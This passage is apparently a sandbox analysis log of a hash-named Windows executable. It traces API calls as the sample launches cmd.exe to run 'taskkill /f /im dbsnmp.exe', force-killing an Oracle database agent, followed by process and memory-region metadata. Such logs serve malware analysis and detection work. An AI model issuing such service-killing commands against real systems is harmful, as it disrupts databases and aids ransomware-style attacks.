lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x35 [0157.823] GetProcessHeap () returned 0x500000 [0157.823] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0xe0) returned 0x50a988 [0157.829] GetProcessHeap () returned 0x500000 [0157.829] RtlReAllocateHeap (Heap=0x500000, Flags=0x0, Ptr=0x50a988, Size=0x76) returned 0x50a988 [0157.829] GetProcessHeap () returned 0x500000 [0157.829] RtlSizeHeap (HeapHandle=0x500000, Flags=0x0, MemoryPointer=0x50a988) returned 0x76 [0157.830] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0157.830] FindFirstFileExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\taskkill \\f\\im dbsnmp.exe ", fInfoLevelId=0x1, lpFindFileData=0x19f958, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f958) returned 0xffffffff [0157.830] GetLastError () returned 0x3 [0157.831] GetProcessHeap () returned 0x500000 [0157.831] RtlFreeHeap (HeapHandle=0x500000, Flags=0x0, BaseAddress=0x50fc68) returned 1 [0157.831] GetProcessHeap () returned 0x500000 [0157.832] RtlFreeHeap (HeapHandle=0x500000, Flags=0x0, BaseAddress=0x513c78) returned 1 [0157.832] GetProcessHeap () returned 0x500000 [0157.832] RtlFreeHeap (HeapHandle=0x500000, Flags=0x0, BaseAddress=0x50bc50) returned 1 [0157.832] GetConsoleOutputCP () returned 0x1b5 [0157.837] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xf3f460 | out: lpCPInfo=0xf3f460) returned 1 [0157.837] GetUserDefaultLCID () returned 0x409 [0157.838] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0xf434a0, cchData=8 | out: lpLCData=":") returned 2 [0157.838] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x19fd84, cchData=128 | out: lpLCData="0") returned 2 [0157.838] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x19fd84, cchData=128 | out: lpLCData="0") returned 2 [0157.838] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x19fd84, cchData=128 | out: lpLCData="1") returned 2 [0157.838] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0xf434b0, cchData=8 | out: lpLCData="/") returned 2 [0157.838] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0xf43500, cchData=32 | out: lpLCData="Mon") returned 4 [0157.838] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0xf43540, cchData=32 | out: lpLCData="Tue") returned 4 [0157.838] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0xf43580, cchData=32 | out: lpLCData="Wed") returned 4 [0157.838] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0xf435c0, cchData=32 | out: lpLCData="Thu") returned 4 [0157.838] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0xf43600, cchData=32 | out: lpLCData="Fri") returned 4 [0157.838] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0xf43640, cchData=32 | out: lpLCData="Sat") returned 4 [0157.838] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0xf43680, cchData=32 | out: lpLCData="Sun") returned 4 [0157.838] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0xf434c0, cchData=8 | out: lpLCData=".") returned 2 [0157.838] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0xf434e0, cchData=8 | out: lpLCData=",") returned 2 [0157.839] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0157.842] GetProcessHeap () returned 0x500000 [0157.842] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x20c) returned 0x50aa50 [0157.842] GetConsoleTitleW (in: lpConsoleTitle=0x50aa50, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\ec7bae245d61cb7f7a9fa51f487a22e006109d628645f31b880fc72ac58f8027.exe") returned 0x62 [0157.843] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75600000 [0157.843] GetProcAddress (hModule=0x75600000, lpProcName="CopyFileExW") returned 0x7561ffc0 [0157.843] GetProcAddress (hModule=0x75600000, lpProcName="IsDebuggerPresent") returned 0x7561b0b0 [0157.844] GetProcAddress (hModule=0x75600000, lpProcName="SetConsoleInputExeNameW") returned 0x7559b440 [0157.844] GetProcessHeap () returned 0x500000 [0157.844] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x400a) returned 0x50bc50 [0157.844] GetProcessHeap () returned 0x500000 [0157.844] RtlFreeHeap (HeapHandle=0x500000, Flags=0x0, BaseAddress=0x50bc50) returned 1 [0157.845] _wcsicmp (_String1="taskkill", _String2=")") returned 75 [0157.845] _wcsicmp (_String1="FOR", _String2="taskkill") returned -14 [0157.845] _wcsicmp (_String1="FOR/?", _String2="taskkill") returned -14 [0157.845] _wcsicmp (_String1="IF", _String2="taskkill") returned -11 [0157.845] _wcsicmp (_String1="IF/?", _String2="taskkill") returned -11 [0157.845] _wcsicmp (_String1="REM", _String2="taskkill") returned -2 [0157.845] _wcsicmp (_String1="REM/?", _String2="taskkill") returned -2 [0157.845] GetProcessHeap () returned 0x500000 [0157.845] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x58) returned 0x50ac68 [0157.845] GetProcessHeap () returned 0x500000 [0157.845] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x1a) returned 0x500578 [0157.846] GetProcessHeap () returned 0x500000 [0157.846] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x30) returned 0x50acc8 [0157.847] GetConsoleTitleW (in: lpConsoleTitle=0x19fa70, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\ec7bae245d61cb7f7a9fa51f487a22e006109d628645f31b880fc72ac58f8027.exe") returned 0x62 [0157.848] _wcsicmp (_String1="taskkill", _String2="DIR") returned 16 [0157.848] _wcsicmp (_String1="taskkill", _String2="ERASE") returned 15 [0157.848] _wcsicmp (_String1="taskkill", _String2="DEL") returned 16 [0157.848] _wcsicmp (_String1="taskkill", _String2="TYPE") returned -24 [0157.848] _wcsicmp (_String1="taskkill", _String2="COPY") returned 17 [0157.848] _wcsicmp (_String1="taskkill", _String2="CD") returned 17 [0157.848] _wcsicmp (_String1="taskkill", _String2="CHDIR") returned 17 [0157.848] _wcsicmp (_String1="taskkill", _String2="RENAME") returned 2 [0157.848] _wcsicmp (_String1="taskkill", _String2="REN") returned 2 [0157.848] _wcsicmp (_String1="taskkill", _String2="ECHO") returned 15 [0157.848] _wcsicmp (_String1="taskkill", _String2="SET") returned 1 [0157.848] _wcsicmp (_String1="taskkill", _String2="PAUSE") returned 4 [0157.848] _wcsicmp (_String1="taskkill", _String2="DATE") returned 16 [0157.848] _wcsicmp (_String1="taskkill", _String2="TIME") returned -8 [0157.849] _wcsicmp (_String1="taskkill", _String2="PROMPT") returned 4 [0157.849] _wcsicmp (_String1="taskkill", _String2="MD") returned 7 [0157.849] _wcsicmp (_String1="taskkill", _String2="MKDIR") returned 7 [0157.849] _wcsicmp (_String1="taskkill", _String2="RD") returned 2 [0157.849] _wcsicmp (_String1="taskkill", _String2="RMDIR") returned 2 [0157.849] _wcsicmp (_String1="taskkill", _String2="PATH") returned 4 [0157.849] _wcsicmp (_String1="taskkill", _String2="GOTO") returned 13 [0157.849] _wcsicmp (_String1="taskkill", _String2="SHIFT") returned 1 [0157.849] _wcsicmp (_String1="taskkill", _String2="CLS") returned 17 [0157.849] _wcsicmp (_String1="taskkill", _String2="CALL") returned 17 [0157.849] _wcsicmp (_String1="taskkill", _String2="VERIFY") returned -2 [0157.849] _wcsicmp (_String1="taskkill", _String2="VER") returned -2 [0157.849] _wcsicmp (_String1="taskkill", _String2="VOL") returned -2 [0157.849] _wcsicmp (_String1="taskkill", _String2="EXIT") returned 15 [0157.849] _wcsicmp (_String1="taskkill", _String2="SETLOCAL") returned 1 [0157.849] _wcsicmp (_String1="taskkill", _String2="ENDLOCAL") returned 15 [0157.849] _wcsicmp (_String1="taskkill", _String2="TITLE") returned -8 [0157.849] _wcsicmp (_String1="taskkill", _String2="START") returned 1 [0157.849] _wcsicmp (_String1="taskkill", _String2="DPATH") returned 16 [0157.849] _wcsicmp (_String1="taskkill", _String2="KEYS") returned 9 [0157.849] _wcsicmp (_String1="taskkill", _String2="MOVE") returned 7 [0157.849] _wcsicmp (_String1="taskkill", _String2="PUSHD") returned 4 [0157.849] _wcsicmp (_String1="taskkill", _String2="POPD") returned 4 [0157.849] _wcsicmp (_String1="taskkill", _String2="ASSOC") returned 19 [0157.849] _wcsicmp (_String1="taskkill", _String2="FTYPE") returned 14 [0157.849] _wcsicmp (_String1="taskkill", _String2="BREAK") returned 18 [0157.849] _wcsicmp (_String1="taskkill", _String2="COLOR") returned 17 [0157.849] _wcsicmp (_String1="taskkill", _String2="MKLINK") returned 7 [0157.849] _wcsicmp (_String1="taskkill", _String2="DIR") returned 16 [0157.849] _wcsicmp (_String1="taskkill", _String2="ERASE") returned 15 [0157.849] _wcsicmp (_String1="taskkill", _String2="DEL") returned 16 [0157.850] _wcsicmp (_String1="taskkill", _String2="TYPE") returned -24 [0157.850] _wcsicmp (_String1="taskkill", _String2="COPY") returned 17 [0157.850] _wcsicmp (_String1="taskkill", _String2="CD") returned 17 [0157.850] _wcsicmp (_String1="taskkill", _String2="CHDIR") returned 17 [0157.850] _wcsicmp (_String1="taskkill", _String2="RENAME") returned 2 [0157.850] _wcsicmp (_String1="taskkill", _String2="REN") returned 2 [0157.850] _wcsicmp (_String1="taskkill", _String2="ECHO") returned 15 [0157.850] _wcsicmp (_String1="taskkill", _String2="SET") returned 1 [0157.850] _wcsicmp (_String1="taskkill", _String2="PAUSE") returned 4 [0157.850] _wcsicmp (_String1="taskkill", _String2="DATE") returned 16 [0157.850] _wcsicmp (_String1="taskkill", _String2="TIME") returned -8 [0157.850] _wcsicmp (_String1="taskkill", _String2="PROMPT") returned 4 [0157.850] _wcsicmp (_String1="taskkill", _String2="MD") returned 7 [0157.850] _wcsicmp (_String1="taskkill", _String2="MKDIR") returned 7 [0157.850] _wcsicmp (_String1="taskkill", _String2="RD") returned 2 [0157.850] _wcsicmp (_String1="taskkill", _String2="RMDIR") returned 2 [0157.850] _wcsicmp (_String1="taskkill", _String2="PATH") returned 4 [0157.850] _wcsicmp (_String1="taskkill", _String2="GOTO") returned 13 [0157.850] _wcsicmp (_String1="taskkill", _String2="SHIFT") returned 1 [0157.850] _wcsicmp (_String1="taskkill", _String2="CLS") returned 17 [0157.850] _wcsicmp (_String1="taskkill", _String2="CALL") returned 17 [0157.850] _wcsicmp (_String1="taskkill", _String2="VERIFY") returned -2 [0157.850] _wcsicmp (_String1="taskkill", _String2="VER") returned -2 [0157.850] _wcsicmp (_String1="taskkill", _String2="VOL") returned -2 [0157.850] _wcsicmp (_String1="taskkill", _String2="EXIT") returned 15 [0157.850] _wcsicmp (_String1="taskkill", _String2="SETLOCAL") returned 1 [0157.850] _wcsicmp (_String1="taskkill", _String2="ENDLOCAL") returned 15 [0157.850] _wcsicmp (_String1="taskkill", _String2="TITLE") returned -8 [0157.851] _wcsicmp (_String1="taskkill", _String2="START") returned 1 [0157.851] _wcsicmp (_String1="taskkill", _String2="DPATH") returned 16 [0157.851] _wcsicmp (_String1="taskkill", _String2="KEYS") returned 9 [0157.851] _wcsicmp (_String1="taskkill", _String2="MOVE") returned 7 [0157.851] _wcsicmp (_String1="taskkill", _String2="PUSHD") returned 4 [0157.851] _wcsicmp (_String1="taskkill", _String2="POPD") returned 4 [0157.851] _wcsicmp (_String1="taskkill", _String2="ASSOC") returned 19 [0157.851] _wcsicmp (_String1="taskkill", _String2="FTYPE") returned 14 [0157.851] _wcsicmp (_String1="taskkill", _String2="BREAK") returned 18 [0157.851] _wcsicmp (_String1="taskkill", _String2="COLOR") returned 17 [0157.851] _wcsicmp (_String1="taskkill", _String2="MKLINK") returned 7 [0157.851] _wcsicmp (_String1="taskkill", _String2="FOR") returned 14 [0157.851] _wcsicmp (_String1="taskkill", _String2="IF") returned 11 [0157.851] _wcsicmp (_String1="taskkill", _String2="REM") returned 2 [0157.851] GetProcessHeap () returned 0x500000 [0157.851] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x210) returned 0x50ad00 [0157.851] GetProcessHeap () returned 0x500000 [0157.851] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x42) returned 0x50af18 [0157.851] _wcsnicmp (_String1="task", _String2="cmd ", _MaxCount=0x4) returned 17 [0157.852] GetProcessHeap () returned 0x500000 [0157.852] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x418) returned 0x5005c8 [0157.852] SetErrorMode (uMode=0x0) returned 0x8003 [0157.852] SetErrorMode (uMode=0x1) returned 0x0 [0157.852] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x5005d0, lpFilePart=0x19f57c | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFilePart=0x19f57c*="Desktop") returned 0x1d [0157.852] SetErrorMode (uMode=0x8003) returned 0x1 [0157.852] GetProcessHeap () returned 0x500000 [0157.852] RtlReAllocateHeap (Heap=0x500000, Flags=0x0, Ptr=0x5005c8, Size=0x56) returned 0x5005c8 [0157.852] GetProcessHeap () returned 0x500000 [0157.852] RtlSizeHeap (HeapHandle=0x500000, Flags=0x0, MemoryPointer=0x5005c8) returned 0x56 [0157.852] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x63 [0157.852] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0157.852] GetProcessHeap () returned 0x500000 [0157.852] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x110) returned 0x50af68 [0157.852] GetProcessHeap () returned 0x500000 [0157.852] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x218) returned 0x500628 [0157.857] GetProcessHeap () returned 0x500000 [0157.857] RtlReAllocateHeap (Heap=0x500000, Flags=0x0, Ptr=0x500628, Size=0x112) returned 0x500628 [0157.857] GetProcessHeap () returned 0x500000 [0157.857] RtlSizeHeap (HeapHandle=0x500000, Flags=0x0, MemoryPointer=0x500628) returned 0x112 [0157.857] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x35 [0157.857] GetProcessHeap () returned 0x500000 [0157.857] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0xe0) returned 0x50b080 [0157.859] GetProcessHeap () returned 0x500000 [0157.859] RtlReAllocateHeap (Heap=0x500000, Flags=0x0, Ptr=0x50b080, Size=0x76) returned 0x50b080 [0157.859] GetProcessHeap () returned 0x500000 [0157.859] RtlSizeHeap (HeapHandle=0x500000, Flags=0x0, MemoryPointer=0x50b080) returned 0x76 [0157.859] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0157.859] FindFirstFileExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\taskkill.*", fInfoLevelId=0x1, lpFindFileData=0x19f308, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f308) returned 0xffffffff [0157.859] GetLastError () returned 0x2 [0157.859] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0157.859] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\taskkill.*", fInfoLevelId=0x1, lpFindFileData=0x19f308, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f308) returned 0x50b100 [0157.860] GetProcessHeap () returned 0x500000 [0157.860] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x14) returned 0x5077c8 [0157.860] FindClose (in: hFindFile=0x50b100 | out: hFindFile=0x50b100) returned 1 [0157.860] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\taskkill.COM", fInfoLevelId=0x1, lpFindFileData=0x19f308, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f308) returned 0xffffffff [0157.860] GetLastError () returned 0x2 [0157.860] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\taskkill.EXE", fInfoLevelId=0x1, lpFindFileData=0x19f308, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f308) returned 0x50b100 [0157.860] GetProcessHeap () returned 0x500000 [0157.860] RtlReAllocateHeap (Heap=0x500000, Flags=0x0, Ptr=0x5077c8, Size=0x4) returned 0x50b140 [0157.860] FindClose (in: hFindFile=0x50b100 | out: hFindFile=0x50b100) returned 1 [0157.860] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0157.860] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0157.860] GetConsoleTitleW (in: lpConsoleTitle=0x19f7fc, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\ec7bae245d61cb7f7a9fa51f487a22e006109d628645f31b880fc72ac58f8027.exe") returned 0x62 [0157.862] InitializeProcThreadAttributeList (in: lpAttributeList=0x19f728, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x19f70c | out: lpAttributeList=0x19f728, lpSize=0x19f70c) returned 1 [0157.862] UpdateProcThreadAttribute (in: lpAttributeList=0x19f728, dwFlags=0x0, Attribute=0x60001, lpValue=0x19f714, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x19f728, lpPreviousValue=0x0) returned 1 [0157.862] GetStartupInfoW (in: lpStartupInfo=0x19f760 | out: lpStartupInfo=0x19f760*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x144, hStdOutput=0x154, hStdError=0x158)) [0157.862] GetProcessHeap () returned 0x500000 [0157.862] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x18) returned 0x5074e8 [0157.862] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0157.862] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0157.862] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0157.862] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0157.862] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0157.862] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0157.862] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0157.862] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0157.862] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0157.862] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0157.862] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0157.862] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0157.862] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0157.862] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0157.862] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0157.862] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0157.863] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0157.863] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0157.863] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0157.863] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0157.863] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0157.863] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0157.863] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0157.863] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0157.863] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0157.863] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0157.863] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0157.863] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0157.863] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0157.863] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0157.863] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0157.863] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0157.863] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0157.863] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0157.863] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0157.863] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0157.863] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0157.863] GetProcessHeap () returned 0x500000 [0157.863] RtlFreeHeap (HeapHandle=0x500000, Flags=0x0, BaseAddress=0x5074e8) returned 1 [0157.863] GetProcessHeap () returned 0x500000 [0157.863] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0xa) returned 0x50b100 [0157.863] lstrcmpW (lpString1="\\taskkill.exe", lpString2="\\XCOPY.EXE") returned -1 [0157.868] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\taskkill.exe", lpCommandLine="taskkill /f /im dbsnmp.exe ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpStartupInfo=0x19f6b0*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="taskkill /f /im dbsnmp.exe ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x19f6fc | out: lpCommandLine="taskkill /f /im dbsnmp.exe ", lpProcessInformation=0x19f6fc*(hProcess=0x9c, hThread=0x98, dwProcessId=0x13c8, dwThreadId=0xc60)) returned 1 [0157.899] CloseHandle (hObject=0x98) returned 1 [0157.899] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0157.899] GetProcessHeap () returned 0x500000 [0157.900] RtlFreeHeap (HeapHandle=0x500000, Flags=0x0, BaseAddress=0x509d50) returned 1 [0157.900] GetEnvironmentStringsW () returned 0x509d50* [0157.900] GetProcessHeap () returned 0x500000 [0157.900] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0xa76) returned 0x50bc50 [0157.901] FreeEnvironmentStringsA (penv="=") returned 1 [0157.901] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0xffffffff) returned 0x0 [0159.229] GetExitCodeProcess (in: hProcess=0x9c, lpExitCode=0x19f694 | out: lpExitCode=0x19f694*=0x80) returned 1 [0159.230] CloseHandle (hObject=0x9c) returned 1 [0159.230] _vsnwprintf (in: _Buffer=0x19f77c, _BufferCount=0x13, _Format="%08X", _ArgList=0x19f69c | out: _Buffer="00000080") returned 8 [0159.231] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000080") returned 1 [0159.231] GetProcessHeap () returned 0x500000 [0159.231] RtlFreeHeap (HeapHandle=0x500000, Flags=0x0, BaseAddress=0x50bc50) returned 1 [0159.231] GetEnvironmentStringsW () returned 0x50b150* [0159.231] GetProcessHeap () returned 0x500000 [0159.231] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0xa9c) returned 0x50bbf8 [0159.232] FreeEnvironmentStringsA (penv="=") returned 1 [0159.232] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0159.232] GetProcessHeap () returned 0x500000 [0159.232] RtlFreeHeap (HeapHandle=0x500000, Flags=0x0, BaseAddress=0x50bbf8) returned 1 [0159.235] GetEnvironmentStringsW () returned 0x50b150* [0159.235] GetProcessHeap () returned 0x500000 [0159.235] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0xa9c) returned 0x50bbf8 [0159.235] FreeEnvironmentStringsA (penv="=") returned 1 [0159.235] GetProcessHeap () returned 0x500000 [0159.235] RtlFreeHeap (HeapHandle=0x500000, Flags=0x0, BaseAddress=0x50b100) returned 1 [0159.235] DeleteProcThreadAttributeList (in: lpAttributeList=0x19f728 | out: lpAttributeList=0x19f728) [0159.235] _get_osfhandle (_FileHandle=1) returned 0x154 [0159.235] SetConsoleMode (hConsoleHandle=0x154, dwMode=0x0) returned 0 [0159.235] _get_osfhandle (_FileHandle=1) returned 0x154 [0159.235] GetConsoleMode (in: hConsoleHandle=0x154, lpMode=0xf3f40c | out: lpMode=0xf3f40c) returned 0 [0159.235] _get_osfhandle (_FileHandle=0) returned 0x144 [0159.235] GetConsoleMode (in: hConsoleHandle=0x144, lpMode=0xf3f408 | out: lpMode=0xf3f408) returned 0 [0159.235] GetConsoleOutputCP () returned 0x1b5 [0159.238] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xf3f460 | out: lpCPInfo=0xf3f460) returned 1 [0159.239] SetThreadUILanguage (LangId=0x0) returned 0x409 [0159.241] exit (_Code=128) Thread: id = 169 os_tid = 0xd30 Process: id = "23" image_name = "taskkill.exe" filename = "c:\\windows\\syswow64\\taskkill.exe" page_root = "0x32f94000" os_pid = "0x13c8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "22" os_parent_pid = "0xef8" cmd_line = "taskkill /f /im dbsnmp.exe " cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f72e" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2045 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 2046 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 2047 start_va = 0x50000 end_va = 0x65fff monitored = 0 entry_point = 0x5de80 region_type = mapped_file name = "taskkill.exe" filename = "\\Windows\\SysWOW64\\taskkill.exe" (normalized: "c:\\windows\\syswow64\\taskkill.exe") Region: id = 2048 start_va = 0x70000 end_va = 0x406ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 2049 start_va = 0x4070000 end_va = 0x4084fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004070000" filename = "" Region: id = 2050 start_va = 0x4090000 end_va = 0x40cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004090000" filename = "" Region: id = 2051 start_va = 0x40d0000 end_va = 0x410ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000040d0000" filename = "" Region: id = 2052 start_va = 0x4200000 end_va = 0x43fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004200000" filename = "" Region: id = 2053 start_va = 0x77720000 end_va = 0x7789afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 2054 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 2055 start_va = 0x7ffe0000 end_va = 